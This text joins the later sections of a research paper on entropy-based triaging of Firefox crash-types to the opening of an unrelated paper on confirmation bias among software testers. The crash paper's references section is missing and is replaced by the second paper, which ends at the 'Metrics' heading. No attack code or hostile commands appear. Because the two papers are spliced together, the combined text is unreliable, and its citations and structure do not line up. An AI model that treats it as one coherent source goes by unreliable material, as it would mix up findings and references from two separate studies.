For each crash-type from the two groups, we compute the duration of the fixing period of the crash-type. We observe that, on average, crash-types with high entropy values take longer to get fixed than crash-types with low entropy values. We perform a Wilcoxon rank sum test and obtain a \(p\)-value of 0.006. Therefore, we reject \(H_{02}^{\text{RQ1}}\). We compute the number of comments exchanged about each crash-type from our two groups. On average, 55.5 comments were exchanged for crash-types with high entropy values compared to 17.65 comments for crash-types with low entropy values. We perform a Wilcoxon rank sum test and obtain a \(p\)-value of 0.001. Hence, we reject \(H_{03}^{\text{RQ1}}\). Crash-types with high entropy values take longer to get fixed, and more comments are exchanged during their fixing period.
Although one could have expected crash-types with low entropy values to take longer to get fixed and spark more discussion, because of the potential difficulty of their replication, our results show the opposite. We explain this finding by the fact that many crash-types with low entropy values are left unfixed: 20% of crash-types with low entropy values in our data set never got fixed, and our analysis only considered crash-types whose underlying bugs were eventually fixed.
We conclude that an entropy analysis can help developers and quality managers identify crash-types that will be particularly difficult to fix because they are likely to be related to many bugs, a situation that will likely result in longer fixing periods and more contribution effort from developers. Therefore, we answer our research question positively.
**RQ2: Do crash-types belonging to different regions of an entropy graph possess different characteristics?**
To answer this research question, we compute for each fixed crash-type from our data set, the duration of its fixing period and the number of comments exchanged by developers about the crash-type. We also compute the entropy and frequency values of the crash-type and map the crash-type into a region of the entropy graph. We organize the crash-types in four groups corresponding to the four regions of the entropy graph that are illustrated on Figure 4.
We observe that crash-types from the Skewed region take the longest time to get fixed: their average fixing time is 21,169 hours, followed by crash-types from the Moderately Distributed region with an average of 8,475 hours. The average fixing time of crash-types from the Highly Distributed region is 4,299 hours. Crash-types from the Isolated region take on average 3,562 hours to get fixed. We perform the Kruskal-Wallis rank sum test on the durations of crash-types fixing periods from the four regions and obtain a \(p\)-value of 0.005. Therefore, we reject \(H_{01}^{\text{RQ2}}\).
The number of comments exchanged by developers about the crash-types is significantly different across the groups formed by the regions of the entropy graph. We obtain a \(p\)-value of \(2.2e - 16\) for the Kruskal-Wallis rank sum test.
We observe that the average comment rate for a crash-type in the Highly Distributed region is 22 comments, and the average comment rate in the Moderately Distributed region is 20 comments. The average comment rate is the highest for crash-types from the Skewed region (67 comments) and the lowest for crash-types from the Isolated region (9 comments). Hence, we reject \(H_{02}^{\text{RQ2}}\).
Crash-types from the Skewed region appear to be harder to fix. The duration of their fixing period is on average five times the duration of the fixing period of a crash-type from the Highly Distributed region, and the average comment rate in the Skewed region is three times the average comment rate in the Highly Distributed region. This result is expected: because of the low entropy of crash-types from the Skewed region, developers are likely to have difficulties finding enough information to replicate and fix the crash. This result complements our finding from RQ1 that crash-types with low entropy values require less effort to get fixed. In fact, we now observe that when a crash-type with a low entropy value has a high frequency, the effort required to fix the crash-type becomes very high, a finding that also confirms our intuition from Section II-C that a combination of entropy and frequency values provides a better assessment of the overall impact of a crash-type than either frequency or entropy alone.
When both the frequency and entropy values of a crash-type are low (i.e., the crash-type belongs to the Isolated region), we observe that it takes less time for developers to fix the crash-type. We explain this result by the fact that crash-types from the Isolated region are likely to be simpler, since they occur infrequently and are encountered by few users. In some cases, as discussed in Section II-B, these crash-types may be the result of anomalies on the users' side and not in the system. Moreover, we observed in our data set that 19.2% of crash-types from the Isolated region are purposely left unfixed.
We conclude from the above results that crash-types from the four regions of our entropy graph possess very different characteristics and require different levels of effort from developers. This answers our second research question positively.
**RQ3: Do entropy graphs help improve the triaging of crash-types?** To assess the benefits of using entropy graphs for crash-types triaging, we compute the similarity between the priority levels assigned by our entropy based crash-type triaging approach and the priority levels of crash-types obtained from bug reports following Equation (2). Table III summarizes the obtained results. Except for crash-types from the Isolated region, the priorities assigned by the entropy based triaging approach are the same as the priority levels obtained from bug reports.
We investigated crash-types from the Isolated region and found that, although they occurred infrequently and affected only a small number of users, the Mozilla quality team assigned a “critical” severity level to 80% of the bugs linked to crash-types from the Isolated region. Overall, 89.3% of the bugs in our data set were found with a “critical”, “major”, or “blocker” severity value, a very high number that hints at a potential inaccuracy in the manual triaging process of Mozilla quality teams. Moreover, we observed that 17% of crash-types from the Isolated region that were assigned a high priority by the Mozilla quality teams are left unfixed. The age of bugs linked to unfixed crash-types with high priority values ranges from 3 months to 7 years and 9 months, while the median age of a fixed bug in our data set is only 2.3 months. The remaining 83% of crash-types with high priority values in the Isolated region required on average 4,620.74 hours from Mozilla developers, with a median fixing duration of 1,680.5 hours; a slower fixing process compared to the time spent by the same developers to fix “low” priority crash-types (2,353.73 hours on average, with a median of 1,104 hours). From these observations, we conclude that although Mozilla quality teams sometimes assign high priorities to crash-types from the Isolated region, they do not fix these crash-types in the timely manner associated with other high priority crash-types in different regions. These results suggest that the crash-type triaging process currently used by Mozilla quality teams should be improved to better reflect the concrete levels of attention paid by developers when fixing crashes.
We answer our research question positively and conclude that entropy graphs provide a better triaging of crash-types than the current Mozilla triage teams. We suggest that developers and quality assurance teams can use our proposed automatic entropy-based triaging approach to speed up and improve their crash-type triaging.
### Table III: Similarity between entropy-based priorities and priorities from bug reports
<table>
<thead>
<tr>
<th>Region</th>
<th>Similarity</th>
</tr>
</thead>
<tbody>
<tr>
<td>Highly Distributed</td>
<td>100%</td>
</tr>
<tr>
<td>Skewed</td>
<td>100%</td>
</tr>
<tr>
<td>Moderately Distributed</td>
<td>100%</td>
</tr>
<tr>
<td>Isolated</td>
<td>19%</td>
</tr>
</tbody>
</table>
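Equation (2) is not reproduced in this excerpt; a plausible reading of the similarity in Table III, sketched below purely as an illustrative assumption, is the percentage of crash-types in a region whose entropy-based priority matches the priority derived from bug reports.

```python
# Hypothetical sketch: "similarity" is assumed here to be the fraction of
# crash-types in a region whose entropy-based priority label matches the
# label obtained from bug reports. All data below are invented.

def region_similarity(entropy_priorities, bug_report_priorities):
    """Percentage of crash-types whose two priority labels agree."""
    assert len(entropy_priorities) == len(bug_report_priorities)
    matches = sum(
        e == b for e, b in zip(entropy_priorities, bug_report_priorities)
    )
    return 100.0 * matches / len(entropy_priorities)

# Toy data: 4 of 5 crash-types agree -> 80% similarity.
print(region_similarity(
    ["high", "high", "low", "medium", "low"],
    ["high", "high", "low", "medium", "high"],
))  # -> 80.0
```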
### IV. Threats to Validity
We now discuss the threats to the validity of our study, following the guidelines for case study research [8].
**Construct validity threats** concern the relation between theory and observation. In this work, construct validity threats are mainly due to measurement errors. We extract crash and bug information by parsing their corresponding HTML (crash reports) and XML (bug reports) files. We use a heuristic based on “install age”, “last crash times”, and the configuration and architecture of crashing systems to identify the unique users of our studied versions of Mozilla Firefox. Because our study critically relies on the identification of users reporting the crash-types, prior to this study we exchanged with members of the quality assurance team at the Mozilla Foundation to confirm our user identification heuristic. We also randomly sampled 10 of our identified user profiles and manually verified the consistency of information in the crash reports of their reported crash-types. In two cases, we had to merge profiles because of high similarities in their respective crash reports. We found the other profiles to be consistent and unique. More validation of our identified user set is needed to strengthen the findings of this study. Another construct validity threat concerns missing priority information in bug reports: we use a heuristic based on severity levels to estimate priorities. A severity level indicates the seriousness of a bug, and developers refer to severity levels when fixing bugs.
**Internal validity threats** do not affect this study since we do not claim causation [8]. We simply report our observations and try to provide explanations for them.
**Conclusion validity threats** concern the relation between the treatment and the outcome. We paid attention not to violate the assumptions of the performed statistical tests. We used non-parametric tests that do not require assumptions about the distribution of the data.
**Reliability validity threats** concern the possibility of replicating this study. We attempt to provide all the details necessary to replicate our results. Both the Socorro crash server and Bugzilla are publicly available, so interested researchers can obtain the same data for the same releases of Firefox.
**External validity threats** concern the possibility of generalizing our results. Although this study is limited to 10 releases of Firefox, we obtain results consistent with previous findings [2] that the current triaging process fails to ensure that developers' time is spent on the more critical bugs that will actually get fixed. Nevertheless, further studies with different systems and different crash triaging systems are desirable to make our findings more general.
### V. Related Work
In this section, we introduce related literature on triage in software testing and discuss entropy analysis in software engineering studies.
#### A. Triage in Software Testing
Several researchers have developed techniques and tools to help developers and quality assurance teams improve their triaging activities. Jeong et al. [9] investigated the reassignment of bug reports and proposed the use of tossing graphs to support bug triaging activities. Anvik et al. [3] propose a semi-automated approach to assign developers to bug reports. This approach is based on a machine learning algorithm that learns the kinds of reports resolved by each developer in the past and suggests a small number of best candidate developers for each new bug. Canfora and Cerulo [10] propose a semi-automatic method that suggests the set of candidate developers best suited to resolve new change requests. The method retrieves the candidate developers using the textual description of the change requests. Menzies and Marcus [11] propose SEVERIS, an automated method to assist triage teams in assigning severity levels to bug reports. A machine learning algorithm is used to learn the severity levels from existing sets of bug reports. Weiss et al. [12] introduce an approach to help triage teams automatically predict the duration of the bug fixing period. This enables them to perform early effort estimations and to better assign the issues. Different from the aforementioned approaches, which focus on bug triage, our study analyzes crash triage and proposes a new triaging approach for crash-types. Since crash-types are linked to bugs, triage teams could combine the results of our entropy-based crash-type triaging approach with previous bug triaging techniques to assign developers to crash-types, or to decide when to fix a crash-type (e.g., a crash-type that would take too long to fix may be purposely left unfixed until a future release).
#### B. Entropy Analysis in Software Engineering Studies
Entropy measures are extensively used in software engineering studies. Hassan et al. [13], in their investigation of the complexity of software development processes, use the Shannon entropy to measure the complexity of systems and conclude that systems with higher entropy rates are more complex and decay over time. Similarly, Zaman et al. [14], in their comparative study of security and performance bugs, apply the same normalized Shannon entropy to bug fixing patches to assess the complexity of bug fixes. Bianchi et al. [15] propose the use of entropy metrics to monitor the degradation of software systems. They develop a tool based on software representation models to automatically compute entropy metrics before and after every maintenance intervention. Hafiz et al. [16] treat a software system as an information source and use the Shannon, Hartley, and Renyi entropy measures to extract different types of information from the system. They remark that files that are more functional and descriptive provide a larger amount of entropy. Kim et al. [17] propose new software complexity metrics (i.e., class complexity and inter-object complexity) for object-oriented software systems based on the traditional Shannon entropy. Chapin et al. [18] analyze entropy metrics of software systems and conclude that, by observing any abrupt change in the entropy of a software system, one can gain good insight into how the maintenance of the system should be performed.
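The exact formulas used in [13, 14] are not reproduced in this excerpt; a common formulation of the normalized Shannon entropy they refer to, sketched here for illustration, divides the raw entropy by its maximum `log(n)` so the value lies in [0, 1] (1 = a crash-type reported evenly across users, 0 = concentrated on one user):

```python
import math

# Sketch of a normalized Shannon entropy: H = -sum(p_i * ln(p_i)) / ln(n).
# The per-user occurrence counts below are invented for illustration.

def normalized_entropy(counts):
    n = len(counts)
    total = sum(counts)
    if n < 2 or total == 0:
        return 0.0
    h = 0.0
    for c in counts:
        if c > 0:
            p = c / total
            h -= p * math.log(p)
    return h / math.log(n)

# A crash-type reported evenly by 4 users is maximally distributed:
print(round(normalized_entropy([5, 5, 5, 5]), 3))   # -> 1.0
# A skewed distribution (one dominant user) yields a lower entropy:
print(round(normalized_entropy([17, 1, 1, 1]), 3))  # -> 0.424
```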
Another interesting take on entropy analysis is the work by Unger et al. [19], who use the Shannon entropy measure to quantify the information content of databases and propose a measure of the general vulnerability of databases based on entropy values. Similar to our study, they analyze large software repositories and propose a technique based on entropy analysis.
### VI. Conclusion
Triaging crash-types is a crucial software maintenance activity. A good triaging of crash-types is essential to allow developers and maintainers to focus their efforts more efficiently. Our study proposes a new triaging approach based on an entropy analysis of crash-types. The new approach introduces a concept of entropy graph regions to assign priority values to crash-types.
Quantitatively, we have shown that entropy analysis helps classify crash-types by their level of difficulty. We have also shown the ability of entropy regions to discriminate crash-types with different characteristics. We evaluate the proposed entropy-based triaging approach by comparing the similarity between its assigned priority levels and the priority levels of crash-types obtained from bug reports. We find that, for all regions except the Isolated region, the priorities assigned by the entropy-based triaging approach are the same as the priority levels obtained from bug reports. A further analysis of the priorities in the Isolated region reveals that, although Mozilla quality teams sometimes assign high priorities to crash-types from this region, they do not prioritize fixing these crash-types. Our results suggest the need to improve the current crash-type triaging process of Mozilla quality teams. The priorities assigned based on entropy values better reflect the priorities that developers apply when fixing the crashes. Developers and quality assurance teams could use our proposed automatic entropy-based triaging approach to improve their crash-type triaging and better plan their testing and maintenance activities. In future work, we plan to perform further validation of our approach on different systems using different crash triaging processes.
### References
Empirical analyses of the factors affecting confirmation bias and the effects of confirmation bias on software developer/tester performance
Conference or Workshop Item
Version: Accepted Manuscript
Link(s) to article on publisher’s website:
http://dx.doi.org/doi:10.1145/1868328.1868344
Empirical Analyses of the Factors Affecting Confirmation Bias and the Effects of Confirmation Bias on Software Developer/Tester Performance
Gul Calikli
Software Research Laboratory
Department of Computer Engineering,
Bogazici University, Turkey
0090 212 3595400-7227
gul.calikli@boun.edu.tr
Ayse Bener
Ted Rogers School of Information Technology Management,
Ryerson University, Canada
0001 416 9795297
ayse.bener@ryerson.ca
ABSTRACT
Background: During all levels of software testing, the goal should be to fail the code. However, software developers and testers are more likely to choose positive tests rather than negative ones due to the phenomenon called confirmation bias. Confirmation bias is defined as the tendency of people to verify their hypotheses rather than refuting them. In the literature, there are theories about the possible effects of confirmation bias on software development and testing. Due to the tendency towards positive tests, most of the software defects remain undetected, which in turn leads to an increase in software defect density.
Aims: In this study, we analyze factors affecting confirmation bias in order to discover methods to circumvent confirmation bias. The factors, we investigate are experience in software development/testing and reasoning skills that can be gained through education. In addition, we analyze the effect of confirmation bias on software developer and tester performance.
Method: In order to measure and quantify the confirmation bias levels of software developers/testers, we prepared pen-and-paper and interactive tests based on two tasks from the cognitive psychology literature. These tests were conducted with 36 employees of a large-scale telecommunication company in Europe as well as 28 graduate computer engineering students of Bogazici University, for a total of 64 subjects.
We evaluated the outcomes of these tests using the metrics we proposed in addition to some basic methods which we inherited from the cognitive psychology literature.
Results: Results showed that, regardless of experience in software development/testing, abilities such as logical reasoning and strategic hypothesis testing are the differentiating factors for low confirmation bias levels. Moreover, the analysis of the relationship between code defect density and the confirmation bias levels of software developers and testers showed a direct correlation between confirmation bias and the defect proneness of the code.
Conclusions: Our findings show that strong logical reasoning and hypothesis testing skills are differentiating factors in software developer/tester performance in terms of defect rates. We recommend that companies focus on improving the logical reasoning and hypothesis testing skills of their employees by designing training programs. As future work, we plan to replicate this study in other software development companies. Moreover, we will use confirmation bias metrics in addition to product and process metrics in software defect prediction. We believe that confirmation bias metrics would improve the prediction performance of the learning-based defect prediction models we have been building for over a decade.
Categories and Subject Descriptors
H.1.2 [User/Machine Systems]: Human Factors, Software Psychology
General Terms
Measurement, Experimentation, Human Factors
Keywords
Cognitive biases, confirmation bias, software engineering, software testing
1. INTRODUCTION
One of the basic components of software development and testing is the human aspect.
Among these human aspects are cognitive biases, which are defined as the deviation of human mind from the laws of logic and accuracy [1]. The notion of cognitive biases was first introduced by Tversky and Kahneman [2,3]. There are various cognitive bias types such as availability, representativeness, anchoring and adjustment.
As far as we know, Stacy and MacMillian were the pioneers who recognized the possible effects of cognitive biases on software engineering [1]. Another study is by Parsons and Saunders [4], who empirically showed the existence of adjustment and anchoring in software artifact reuse.
Confirmation bias, one of these cognitive biases, is also likely to affect the software development process, as previously indicated by Stacy and MacMillian [1]. The tendency of people to seek evidence that could verify their theories rather than evidence that could falsify them is called confirmation bias. The term was first used by Peter Wason in his rule discovery experiment, in which the subject must try to refute his/her hypotheses to arrive at the correct solution [5].
Wason also explained the results of his selection task experiment using facts based on confirmation bias [7]. In this task, Wason gave subjects partial information about a set of objects, and asked them to specify what further information they would need to tell whether or not a conditional rule ("If A, then B") applies. It has been found repeatedly that people perform badly on various forms of this test, in most cases ignoring information that could potentially refute the rule.
Empirical evidence shows that software testers are more likely to choose positive tests rather than negative tests [8]. However, during all levels of software testing the attempt should be to fail the code to reduce software defect density. In order to discover more defects, confirmation bias levels of testers and developers need to be low.
In this study, we propose a method to measure/quantify confirmation bias levels, so that empirical studies about the effect of confirmation bias on software development/testing can be carried out. Our methodology consists of interactive and written tests based on Wason’s rule discovery and selection tasks, respectively. We analyze the outcomes of our tests based on the existing work in cognitive psychology literature as well as the metrics we have defined during this study.
The rest of the paper is organized as follows: detailed information about confirmation bias and related work in the cognitive psychology literature are given in Section II. We explain our methodology for the measurement/quantification of confirmation bias in Section III. The metrics we defined for this study are explained in Section IV. We describe the dataset used in our empirical analysis in Section V. Results, together with their corresponding interpretations, are presented in Section VI. Finally, the impact of the results and potential future directions are discussed in Section VII.
2. CONFIRMATION BIAS
This section explains the two experiments proposed by P. C. Wason [5,7] to show the presence of confirmation bias.
2.1 Wason’s Rule Discovery Experiment
In this experiment, Wason asked his subjects to discover a simple rule about triples of numbers [5]. Initially, subjects are given a record sheet on which the triple "2, 4, 6" is written.
The experimental procedure can be explained as follows: The subjects are told that "2 4 6" conforms to this rule. In order to discover the rule, they are asked to write down triples together with the reasons of their choice on the record sheet. After each instance, the tester tells whether the instance conforms to the rule or not. The subject can announce the rule only when he/she is highly confident. If the subject cannot discover the rule, he/she can continue giving instances together with reasons for his/her choice. This procedure continues iteratively until either the subject discovers the rule or he/she wishes to give up. If the subject cannot discover the rule in 45 minutes, the experimenter aborts the test.
Wason designed this experiment such that subjects mostly showed a tendency to focus on a set of triples contained inside the set of all triples conforming to the correct rule. Because of this, discovery of the true rule was possible only by refuting the hypotheses that come to mind.
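This design can be sketched programmatically. Wason's hidden rule was simply "numbers in increasing order of magnitude"; the narrow hypothesis below ("steps of 2") is the one the seed triple 2-4-6 typically suggests, so only a test the hypothesis forbids can expose the broader rule:

```python
# Sketch of Wason's 2-4-6 task: the hidden rule is strictly broader than
# the hypothesis suggested by the seed triple, so confirming tests alone
# can never refute the wrong hypothesis.

true_rule = lambda t: t[0] < t[1] < t[2]                       # hidden rule: ascending
hypothesis = lambda t: t[1] - t[0] == 2 and t[2] - t[1] == 2   # "steps of 2"

confirming_tests = [(2, 4, 6), (10, 12, 14), (1, 3, 5)]
falsifying_test = (1, 2, 3)   # violates the hypothesis, but not the rule

# Positive tests all conform, so they never expose the wrong hypothesis:
print(all(true_rule(t) for t in confirming_tests))               # -> True
# Only a hypothesis-violating test reveals the broader rule:
print(hypothesis(falsifying_test), true_rule(falsifying_test))   # -> False True
```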
2.1.1 Eliminative/Enumerative Index
Wason’s eliminative/enumerative index aims to characterize a subject's kind of thinking by considering the nature of the instances given by the subject in relation to the reasons for choosing them. The index is calculated as the ratio of the number of subsequent instances incompatible with each proposed reason to the number of compatible instances, summed over all proposed reasons. Wason indicates that a value greater than 1 is desirable: the higher the index, the lower the subject's confirmation bias.
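The calculation above can be sketched directly; the per-reason counts below are invented for illustration:

```python
# Sketch of the eliminative/enumerative index: for each reason a subject
# proposes, count subsequent instances incompatible vs. compatible with it,
# then take the ratio of the two sums across all reasons.

def elim_enum_index(reasons):
    """reasons: list of (incompatible_count, compatible_count) per reason."""
    incompatible = sum(i for i, _ in reasons)
    compatible = sum(c for _, c in reasons)
    return incompatible / compatible if compatible else float("inf")

# Two proposed reasons; most subsequent instances could refute them,
# so the index exceeds 1 (eliminative, low-bias testing behavior):
print(elim_enum_index([(3, 1), (2, 2)]) > 1)  # -> True
```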
2.1.2 Test Severity
In [6], Poletiek discusses the severity of the tests (i.e., the instances given by subjects to discover the rule) in Wason’s rule discovery task. A test is more severe when the chance of the supporting observation occurring under the assumption of the hypothesis H exceeds the chance of its occurring without the assumption of H (i.e., with the assumption of the background knowledge b only). The higher this ratio (when it exceeds 1), the higher the severity of the test. In other words, when the severity of a test is high, more alternative hypotheses are eliminated.
2.2 Wason’s Selection Task
In the original Wason’s Selection Task, the subject is given four cards, where each card has a letter on one side and a number on the other side. These four cards are placed on a table showing, respectively, D, K, 3, 7. Given the hypothesis “Every card that has a D on one side has a 3 on the other side”, the subject is asked which card(s) must be turned over to find out whether the hypothesis is true or false. The hypothesis can be translated into a logical implication of the form “If P, then Q”, and each test is the selection of one of the cards (P, not-P, Q, not-Q). Wason interprets the selection of cards D and 3 (i.e., P and Q) as the choice of a verifier, whereas a subject is defined to be a falsifier if he/she selects cards D and 7 (i.e., P and not-Q). However, a subject can choose cards D and 3 due to matching bias as well as confirmation bias [6, 9, 10].
2.2.1 Matching Bias
Matching bias may lead subjects to select cards on the basis of a simple judgment of relevance. In other words, the selection of cards D and 3 in the original Wason’s selection task can also result from matching the letter D and the number 3 in the stated hypothesis. Separating matching from logic requires the use of rules of the form “If P, then Q” and the three negated forms of the same rule: “If P, then not-Q”, “If not-P, then Q”, and “If not-P, then not-Q”.
In [4], Evans and Lynch used the negated version of the selection task (i.e., “If P, then not-Q”) as well as the original task (i.e., “If P, then Q”). In this experimental study, the subjects chose the P and Q cards instead of the P and not-Q cards. Evans and Lynch interpreted subjects’ behavior as either falsifying or matching. However, if a subject who has chosen the P and Q cards in the standard version also selects the P and Q cards in the negated version, such behavior can be explained only by matching bias; otherwise, the subject's verifying behavior accompanied by falsifying behavior would not make sense. In our study, all four rule forms are used to detect matching bias.
3. PROPOSED APPROACH TO MEASURE/QUANTIFY CONFIRMATION BIAS
In order to conduct an empirical analysis, we need a methodology to measure/quantify confirmation bias level of individuals. For this purpose, we prepared two types of tests that are interactive test and written test.
3.1 Interactive Test
What we call the interactive test is Wason’s rule discovery task [5]. The interactive test was carried out exactly as the original task described above.
3.1.1 Calculation of Test Severity
There are various challenges in evaluating test severity. Firstly, the set of all possible hypotheses (i.e., the background knowledge) is infinite. Secondly, humans cannot easily keep more than one hypothesis in mind at a time [6]. On the other hand, according to Poletiek, a severe tester will not consciously formulate all hypotheses one by one, yet he/she will be able to make a globally accurate estimation [6]. Hence, it is not necessary to explicitly generate all possible alternatives in order to produce a more or less severe test.
To calculate test severity we followed the method employed by Poletiek in [6]. We took the set of hypotheses generated by the subjects during our interactive tests as the plausible set of hypotheses (i.e., the background knowledge). For each instance given by the subject (i.e., each test made by the subject), we applied the following procedure:
- If the test is positive (i.e. the instance given by the subject conforms to the rule to be discovered), then we took the number of hypotheses that are eliminated by the test as severity of the test. In other words, the hypotheses to which the given instance does not conform are taken into account.
- If the test is negative (i.e. the instance given by the subject does not conform to the rule to be discovered), then we took the number of hypotheses to which the given instance conforms, as severity of the test.
Table 1 shows the set of plausible hypotheses we generated using the rules announced by the subjects during our interactive tests. Our set of plausible alternatives consist of 27 hypotheses, hence severity of each instance given by a subject is within the range [0, 27].
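The severity calculation described above can be sketched with a small assumed subset of hypotheses; the predicates below are illustrative stand-ins for entries of Table 1, not the full 27-hypothesis set:

```python
# Sketch of the severity calculation: count eliminated hypotheses for a
# positive test, and conforming hypotheses for a negative test. The
# hypothesis set is a small invented subset for illustration.

background = [
    lambda t: t[0] < t[1] < t[2],                        # ascending
    lambda t: all(x % 2 == 0 for x in t),                # all even
    lambda t: t[1] - t[0] == 2 and t[2] - t[1] == 2,     # increments of 2
    lambda t: t[0] + t[1] == t[2],                       # first + second = third
]

def severity(instance, conforms_to_target, hypotheses=background):
    """Positive test: number of hypotheses the instance eliminates.
    Negative test: number of hypotheses the instance conforms to."""
    if conforms_to_target:
        return sum(not h(instance) for h in hypotheses)
    return sum(h(instance) for h in hypotheses)

# (1, 2, 3) conforms to an "ascending" target rule but eliminates the
# "all even" and "increments of 2" hypotheses -> severity 2.
print(severity((1, 2, 3), conforms_to_target=True))  # -> 2
```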
3.1.2 Vincent Curves
As Wason defines in [5], Vincent curves represent the performance of subjects towards a criterion that is not defined by a fixed number of trials. During interactive tests, the total number of instances given before discovery of the correct rule varies from one subject to another. Hence, Vincent curves can be used to visualize the change in test severity of a group of subjects until the correct rule is discovered. Although there are variants of Vincent curves, we use the original method proposed by Vincent, as follows:
- Total number of instances given by each subject in the group is divided into N equal fractions.
- Within each fraction, we calculate the average of test severities of the instances that fall into that fraction. This calculation is done for each subject in the group.
For N equal fractions, N+1 data points are obtained per subject. The average of the i-th data point of all subjects gives the i-th data point for the group of subjects, where i = 1, 2, ..., N+1.
We selected the total number of fractions (N) to be equal to the minimum number of instances given within the group before discovery of the correct rule. For numbers of instances not divisible by N, we used Vincent’s original procedure. For instance, the division of 22 instances given by a subject among 5 fractions would be 5, 5, 4, 4, 4. In other words, the 2 additional instances are distributed one by one, starting from the first fraction.
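The within-subject part of the Vincentizing procedure above can be sketched as follows (the severity values are invented; the averaging across subjects is omitted for brevity):

```python
# Sketch of Vincent's fraction split: divide one subject's sequence of test
# severities into n fractions, distributing extra instances one by one
# starting from the first fraction, then average within each fraction.

def vincent_fractions(values, n):
    base, extra = divmod(len(values), n)
    sizes = [base + 1] * extra + [base] * (n - extra)
    out, i = [], 0
    for size in sizes:
        chunk = values[i:i + size]
        out.append(sum(chunk) / size)
        i += size
    return out

# 22 instances over N = 5 fractions -> sizes 5, 5, 4, 4, 4, as in the text.
severities = list(range(22))  # invented severity sequence
print(vincent_fractions(severities, 5))  # -> [2.0, 7.0, 11.5, 15.5, 19.5]
```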
3.2 Written Test
The written test is based on Wason’s selection task [7]. There are three types of questions in the written test: abstract questions, thematic questions, and questions with a software development theme.
Abstract questions require pure logical reasoning to be answered correctly; however, some questions of this type can also be answered correctly by matching. In our test, there are 8 abstract questions.
Thematic questions can be answered correctly using the cues produced by memory. This phenomenon, where the stage of logical reasoning is bypassed, is called memory cueing [8]. In our test there are 6 thematic questions, which can be solved correctly through everyday life experience.
Questions with a software development/testing theme are also thematic questions, where pure logical reasoning can be bypassed by experience in software development and testing. Our test contains 8 questions of this type.
3.2.1 Determination of Existence of Matching Bias
Matching bias detection and classification of subjects as falsifiers, verifiers, or matchers can be done using the abstract test results. In order to detect the existence of matching bias among subjects and classify them, we used all negated variants of Wason’s original selection task:
- If there is a D on one side of the card, then there is a 3 on its other side
- If there is a D on one side of the card, then there is not a 3 on its other side
- If there is not a D on one side of the card, then there is a 3 on its other side
- If there is not a D on one side of the card, then there is not a 3 on its other side
Table 1. The plausible set of hypotheses used for test severity calculation
<table>
<thead>
<tr>
<th>#</th>
<th>Hypothesis</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>Integers ascending with increments of 2</td>
</tr>
<tr>
<td>2</td>
<td>Integers ascending with increments of k, where k = 1, 2, ...</td>
</tr>
<tr>
<td>3</td>
<td>Three integers in ascending order such that the average of the first and third integer is the second integer</td>
</tr>
<tr>
<td>4</td>
<td>The average of the first and third integer is the second integer</td>
</tr>
<tr>
<td>5</td>
<td>Even integers ascending with increments of 2</td>
</tr>
<tr>
<td>6</td>
<td>Integers ascending with increments of m = 2k, where k = 1, 2, 3, ...</td>
</tr>
<tr>
<td>7</td>
<td>Integers ascending or descending with increments of m = 2k, where k = 1, 2, 3, ...</td>
</tr>
<tr>
<td>8</td>
<td>Even integers in ascending order</td>
</tr>
<tr>
<td>9</td>
<td>Positive even integers in ascending order</td>
</tr>
<tr>
<td>10</td>
<td>Three even integers in any order</td>
</tr>
<tr>
<td>11</td>
<td>Three integers in any order, none of them are identical</td>
</tr>
<tr>
<td>12</td>
<td>Three integers in any order, two or three of them are identical</td>
</tr>
<tr>
<td>13</td>
<td>Three integers in ascending order such that difference between third and first number is even</td>
</tr>
<tr>
<td>14</td>
<td>Integers ascending or descending with increments of k, where k = 1, 2, 3, ...</td>
</tr>
<tr>
<td>15</td>
<td>Sum of the first and second integer is the third integer</td>
</tr>
<tr>
<td>16</td>
<td>The triples of the form (2n 4n 6n), where n = 1, 2, 3, ...</td>
</tr>
<tr>
<td>17</td>
<td>The triples of the form (n 2n 3n), where n = 1, 2, 3, ...</td>
</tr>
<tr>
<td>18</td>
<td>Second integer is greater than the first one</td>
</tr>
<tr>
<td>19</td>
<td>Third integer is greater than the first integer</td>
</tr>
<tr>
<td>20</td>
<td>Difference between the third and the first integer is even</td>
</tr>
<tr>
<td>21</td>
<td>Greatest common divisor (GCD) of the integers is 2</td>
</tr>
<tr>
<td>22</td>
<td>Ascending integers such that each integer is 1 less than a prime number</td>
</tr>
<tr>
<td>23</td>
<td>Any three rational numbers</td>
</tr>
<tr>
<td>24</td>
<td>Positive real numbers in increasing order</td>
</tr>
<tr>
<td>25</td>
<td>Positive integers in increasing order</td>
</tr>
<tr>
<td>26</td>
<td>Three integers whose sum is even</td>
</tr>
<tr>
<td>27</td>
<td>Three even integers greater than zero</td>
</tr>
</tbody>
</table>
3.2.2 Falsifier/Verifier/Matcher Classification
As previously mentioned, given a conditional rule of the form if P, then Q, a subject who selects P, Q as the answer can be either a verifier or a matcher. Similarly, the same answer for the rule if P, then not-Q means that the subject can be either a falsifier or a matcher. In order to overcome this ambiguity, we employ the method of Reich and Ruth [14], which is explained as follows:
• choice of not-Q in the rule "If P, then Q" = falsifying
• choice of not-Q in the rule "If P, then not-Q" = verifying
• choice of P in the rule "If not-P, then Q" = matching
• choice of not-Q in the rule "If not-P, then Q" = falsifying
• choice of P in the rule "If not-P, then not-Q" = matching
• choice of not-Q in the rule "If not-P, then not-Q" = verifying
This method of determining response tendencies is advantageous, as it does not confound the strategies that might have contributed to a particular selection. However, it neglects a large proportion of the data provided by the subjects. On the other hand, it gives a general view of the subjects’ responses, and it is the only classification strategy we came across in the existing psychology literature. For these reasons, we used the method of Reich and Ruth and labeled subjects whom we could not classify as None.
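The classification rules above amount to a lookup from (rule form, selected card) to a response tendency. A minimal sketch (not the authors' code; function and card names are hypothetical) is:

```python
# Reich and Ruth's classification of Wason selection-task answers,
# written as a lookup table. A rule has the form "if P, then Q" where
# either side may be negated; `card` names the selected card relative
# to the un-negated propositions ("P", "not-P", "Q", "not-Q").
def classify(p_negated: bool, q_negated: bool, card: str):
    """Return 'falsifying', 'verifying', 'matching', or None."""
    rules = {
        # (p_negated, q_negated, selected card) -> tendency
        (False, False, "not-Q"): "falsifying",   # "If P, then Q"
        (False, True,  "not-Q"): "verifying",    # "If P, then not-Q"
        (True,  False, "P"):     "matching",     # "If not-P, then Q"
        (True,  False, "not-Q"): "falsifying",
        (True,  True,  "P"):     "matching",     # "If not-P, then not-Q"
        (True,  True,  "not-Q"): "verifying",
    }
    return rules.get((p_negated, q_negated, card))
```

Selections that do not hit one of these cells return `None`, matching the paper's treatment of unclassifiable subjects.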
4. METRICS
